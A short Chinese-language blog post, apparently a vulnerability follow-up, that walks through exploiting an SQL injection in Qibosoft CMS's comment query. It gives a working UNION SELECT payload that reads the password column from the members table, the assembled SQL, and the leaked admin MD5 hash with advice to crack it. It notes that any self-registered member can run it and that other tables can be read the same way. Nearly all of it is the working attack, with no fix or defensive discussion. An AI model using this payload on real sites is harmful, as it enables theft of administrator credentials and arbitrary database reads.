詳見：http://dingody.iteye.com/blog/2195864

這裡只說一下最後的利用，還是使用原作者指出的那個注入點，

雖然value值儲存在了兩個sql語句裡面，這兩個語句的列不一樣，如果利用第二個語句，會在第一個語句的時候報列不一致的錯誤；嘗試利用第一個語句。

我構造的語句是  1' union select password from qibosoft_members;#

這裡最後只能用#來註釋掉最後的單引號，使用--仍然會報錯。

所以，拼接出來的sql語句是SELECT aid FROM qibosoft_comment WHERE cid='1' union select password from qibosoft_members;#'

讀取使用者表中的密碼列；打印出執行語句的返回值

 'aid' =>  '21232f297a57a5a743894a0e4a801fc3' (length=32)

打印出的是使用者admin的加密密碼，MD5解密即可。

同理，修改表名和列名可以任意讀取表的內容。

不過想要利用該點需要登陸member系統，只要隨意註冊一個使用者登陸即可，便可以讀取到使用者admin的密碼。

這裡返回的只是第一行的結果。